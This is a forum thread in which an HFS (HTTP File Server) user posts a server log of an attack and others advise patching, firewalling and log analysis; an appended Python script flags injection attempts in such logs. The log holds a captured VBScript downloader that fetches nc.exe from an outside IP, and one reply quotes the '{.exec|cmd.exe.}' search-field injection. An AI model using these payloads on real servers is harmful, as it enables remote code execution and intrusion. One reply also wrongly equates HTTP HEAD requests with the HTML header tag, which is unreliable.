rejetto forum
Software => HFS ~ HTTP File Server => Topic started by: userhfs on March 09, 2016, 03:10:25 PM

- 
Hello all!

Today my antivirus told me that a trojan was deleted. It was a VBS script; I opened it in N++ and here it is in the screenshot.

After that I started trying to find out how it happened. And I found it. HFS is working on port 80, and every day I get a lot of messages about "requested GET" and "trying to upload xml". I opened HFS and saw it (look at the screenshot).

I've exported the full log to a txt file and here it is:
 
 9:24:21 150.70.188.172:53306 Requested GET /
 9:31:24 150.70.173.52:45675 Requested GET /
 10:33:11 150.70.188.182:45937 Requested GET /
 12:42:17 127.0.0.1:58565 Upload failed, Folder not found: getstring.xml
 13:10:33 150.70.188.178:57561 Requested GET /
 15:19:09 150.70.188.178:52023 Requested GET /
 15:36:46 150.70.173.43:58891 Requested GET /
 17:06:33 150.70.173.7:48701 Requested GET /
 18:37:18 150.70.188.181:50506 Requested GET /
 19:07:36 150.70.173.57:57074 Requested GET /
 20:01:32 188.138.1.218:42693 Requested GET /
 21:58:16 188.32.198.69:17087 Requested GET /
 14:03:59 127.0.0.1:64139 Upload failed, Folder not found: getstring.xml
 21:34:42 150.70.173.10:54565 Requested GET /
 23:49:04 150.70.188.172:57408 Requested GET /
 0:05:27 150.70.173.8:56183 Requested GET /
 0:35:08 150.70.188.169:41555 Requested GET /
 3:21:10 150.70.188.166:44530 Requested GET /
 4:36:26 150.70.97.86:48072 Requested GET /
 6:51:26 150.70.173.49:34699 Requested GET /
 7:13:12 185.130.5.146:41838 Requested HEAD /
 7:27:38 94.102.49.78:32822 Requested GET /
 10:14:02 95.220.12.221:56833 Requested GET /
 10:14:02 95.220.12.221:56841 Requested GET /
 11:36:21 150.70.188.182:36670 Requested GET /
 11:50:43 150.70.173.55:57792 Requested GET /
 12:54:18 150.70.188.179:46689 Requested GET /
 13:59:29 150.70.173.44:58075 Requested GET /
 14:04:32 127.0.0.1:61309 Upload failed, Folder not found: getstring.xml
 23:53:11 150.70.188.180:38578 Requested GET /
 2:39:02 162.13.170.123:60331 Requested GET /
 14:05:32 127.0.0.1:58712 Upload failed, Folder not found: getstring.xml
 14:14:29 193.124.183.62:59434 Requested GET /
 18:38:16 150.70.188.165:52615 Requested GET /
 0:53:07 150.70.188.180:38067 Requested GET /
 3:02:21 150.70.173.41:58793 Requested GET /
 4:21:49 37.153.173.10:57460 Requested GET /
 5:25:08 185.129.62.62:55354 Requested GET /
 5:45:42 185.65.135.227:54500 Requested GET /
 6:58:03 171.25.193.131:22518 Requested GET /
 9:45:22 150.70.173.5:41667 Requested GET /
 11:56:00 193.124.183.62:50858 Requested GET /
 12:24:58 185.130.5.146:47664 Requested HEAD /
 14:06:30 127.0.0.1:51959 Upload failed, Folder not found: getstring.xml
 16:53:28 163.172.13.21:63567 Requested GET /
 17:53:59 66.240.192.138:51136 Requested GET /
 18:17:14 150.70.188.171:37191 Requested GET /
 21:19:42 159.224.52.241:57673 Requested GET /
 22:04:44 150.70.173.40:58734 Requested GET /
 23:13:02 193.124.183.62:62283 Requested GET /
 0:27:39 162.13.170.123:56872 Requested GET /
 4:04:43 188.32.105.181:65077 Requested GET /
 4:09:21 150.70.173.58:34591 Requested GET /
 5:16:26 77.247.181.162:46931 Requested GET /
 7:49:13 51.254.44.137:41738 Requested GET /
 9:49:22 150.70.188.178:55827 Requested GET /
 10:38:10 193.124.183.62:61670 Requested GET /
 14:07:31 127.0.0.1:54231 Upload failed, Folder not found: getstring.xml
 15:42:55 185.130.5.146:39691 Requested HEAD /
 17:24:32 137.226.113.7:44838 Requested GET /
 19:15:21 193.124.183.62:55358 Requested GET /
 1:46:28 188.138.1.218:59867 Requested GET /
 3:10:43 62.210.162.182:41469 Requested GET /
 3:10:45 62.210.162.182:48773 Requested GET /
 4:50:19 176.10.99.206:60831 Requested GET /
 5:05:30 112.115.19.84:60662 Requested GET /
 5:06:00 112.115.19.84:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
 > xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
 > xHttp.Send
 >
 > with bStrm
 >     .type = 1 '//binary
 >     .open
 >     .write xHttp.responseBody
 >     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
 > end with.}
 5:06:03 112.115.19.84:60677 Requested GET /?search=
 5:06:04 112.115.19.84:60678 Requested GET /?search=
 5:06:10 112.115.19.84:60679 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
 > xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
 > xHttp.Send
 >
 > with bStrm
 >     .type = 1 '//binary
 >     .open
 >     .write xHttp.responseBody
 >     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
 > end with.}
 5:06:13 112.115.19.84:60680 Requested GET /?search=
 5:06:14 112.115.19.84:60681 Requested GET /?search=
 5:17:19 112.115.19.84:60818 Requested GET /
 5:17:46 112.115.19.84:60839 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
 > xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
 > xHttp.Send
 >
 > with bStrm
 >     .type = 1 '//binary
 >     .open
 >     .write xHttp.responseBody
 >     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
 > end with.}
 5:17:49 112.115.19.84:60840 Requested GET /?search=
 5:17:49 112.115.19.84:60841 Requested GET /?search=
 5:17:58 112.115.19.84:60842 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
 > xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
 > xHttp.Send
 >
 > with bStrm
 >     .type = 1 '//binary
 >     .open
 >     .write xHttp.responseBody
 >     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
 > end with.}
 5:18:00 112.115.19.84:60843 Requested GET /?search=
 5:18:01 112.115.19.84:60844 Requested GET /?search=
 5:32:09 150.70.188.181:42913 Requested GET /
 5:58:29 150.70.188.181:42625 Requested GET /
 
 So, what should I do to prevent the same situation? For now I've switched off HFS+, but I really need it. Let me know how to prevent illegal actions. Thanks!
- 
very strange??

 the target IP for nc.exe is an HFS web server

 the VBS script probably came from another source

 What you can do is to make a log to file and select "request dump" and eventually "reply" to obtain more information about connections

 if possible, block all communication from and to this IP in your firewall
 
 
- 
The VBS script came from HFS+, as you could see, through an HFS vulnerability. The hacker put a special command in the search field and the file was created on my PC. Is there anyone from the admins or technicians? I guess they should know about that. My fault that the root directory didn't have a password. Now I've protected it with a password, so the hacker can't access the search field. The 2nd step was an update of HFS, from 2.3 to 2.3g.
			
- 
with the last build you can be reassured, because you were using version 289, which was sensitive to the cmd attack by URL with "? search = 00%{exec|cmd.exe.}"

 similarly, as explained in this post about build 287, build 289 was not protected
 http://www.rejetto.com/forum/bug-reports/uploading-backdor-in-287/msg1060051/#msg1060051
 since hfs 2.3d build 292 the problem is solved,

 because I have certain privileges here, it is possible for me to access the home page of your server from your IP; I see that you have updated hfs to the latest version, so you no longer risk being the injured party in the same attack
 
 you can now rest easy ;)
 
 strangely HFS server complained to the IP address 150.129.217.214 is no longer available
 
 the "hacker" is not a stranger on the forum
 ;D ;D
- 
Thanks for your reply! OK, now I've set a password for the root directory, and the 'search field' is now unavailable. Thanks!
			
- 
And could someone tell me what this means?
 
 14:11:08 127.0.0.1:55616 Upload failed for getstring.xml: Folder not found.
 14:11:08 127.0.0.1:55616 Upload failed getstring.xml
 18:13:23 Check update: no new version
 
- 
By doing a lookup on that IP address range, it seems that 150.70.*.* (http://whatismyipaddress.com/ip/150.70.173.52) (which appears a lot in your log) belongs to the "trendmicro.com" company, in Japan. Maybe this company was scanning your server, or doing something weird? I don't know, but it doesn't look like an IP address from a normal ISP.

 The IP 150.129.217.214 (http://whatismyipaddress.com/ip/150.129.217.214) is from some ISP in China, and may be some attacker. Well, I'm not an expert on this, but there is no more public information about who may be behind this (only that Chinese ISP knows who the end user was, if that user wasn't browsing from a public cybercafe).
- 
Using this software, you will see in real time which process is using the address 127.0.0.1 remotely on port 80

 unzip and run TCPView.exe; you may get an alert from protection software, which you can ignore without risk.
- 
I'm sorry for this accident, but it's a bad idea to have a server on the internet and not keep it updated.
 
 
- 
What is "Requested HEAD /"?
			
- 
a request HEAD is exactly that, it just requests the URL header

 in html
 https://www.w3schools.com/tags/tag_header.asp
 <header>
 </header>

 is only retrieved here

 this would include cookie sid / encryption and other info on what webserver you're using and other things,
 it's normal to see a HEAD request followed by other networking and requests

 in the white-hat ethical hacking course, this is an attempt to see what is running and what replies with what.

 given the hack attempt, I would assume that the request was to see what version of hfs you were running with what web client and how they would attempt a DoS attack on your site
 
- 
				 
 Thanks!
 Sent to ban the IP from which HEAD / was requested
 Is it possible to configure things so that IPs making such a request are blocked automatically?
 
 
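An added example, not from this thread or from HFS itself, for the two questions above (what to make of the log entries posted at the top of the thread, and whether such requests can be blocked automatically): a Python script that parses lines in the HFS log layout shown in this thread, flags any request whose query carries HFS template-macro delimiters (`{.` ... `.}`) or the script text echoed in the log, and collects the source IPs as a block-candidate list for a firewall. HEAD / requests are reported separately, because ordinary scanners and crawlers send them too and a HEAD on its own is not evidence of an attack; the sample log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the HFS log layout used in this thread
# (time, client ip:port, request); the request text mirrors what the thread shows.
SAMPLE_LOG = """\
9:24:21 150.70.188.172:53306 Requested GET /
7:13:12 185.130.5.146:41838 Requested HEAD /
5:06:00 112.115.19.84:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
5:17:46 112.115.19.84:60839 Requested GET /?search=%00{.exec|cmd.exe.}
14:03:59 127.0.0.1:64139 Upload failed, Folder not found: getstring.xml
"""

# "H:MM:SS ip:port Requested METHOD target"; other HFS lines (uploads, update checks) do not match.
LINE_RE = re.compile(
    r"^(\d{1,2}:\d{2}:\d{2}) (\d{1,3}(?:\.\d{1,3}){3}):(\d+) Requested (\w+) (\S.*)$"
)
# HFS template macros are written {.name|args.}; a client has no legitimate reason to send one.
MACRO_RE = re.compile(r"\{\.")
# Fragments of the VBScript downloader text that was echoed into this thread's log.
SCRIPT_RE = re.compile(r"createobject|adodb\.stream|xhttp|savetofile", re.IGNORECASE)


def classify(line):
    """Return (ip, verdict) for one request line, or None for a non-request line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    _time, ip, _port, method, target = m.groups()
    decoded = unquote(target)  # catch %7B.exec... as well as the literal form
    if MACRO_RE.search(decoded) or SCRIPT_RE.search(decoded):
        return ip, "macro-injection"
    if method == "HEAD":
        return ip, "recon"
    return ip, "normal"


def summarize(log_text):
    """Group source IPs by verdict; 'macro-injection' is the firewall block-candidate list."""
    result = {"macro-injection": set(), "recon": set(), "normal": set()}
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            result[hit[1]].add(hit[0])
    return result


if __name__ == "__main__":
    for verdict, ips in summarize(SAMPLE_LOG).items():
        print(f"{verdict}: {sorted(ips)}")
```

Blocking the sources only limits the damage; as the thread says, the macro injection itself is fixed by running hfs 2.3d build 292 or later.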
- 
the higher the number of the port, the harder it will be to reach.
 But FIRST the software must be updated.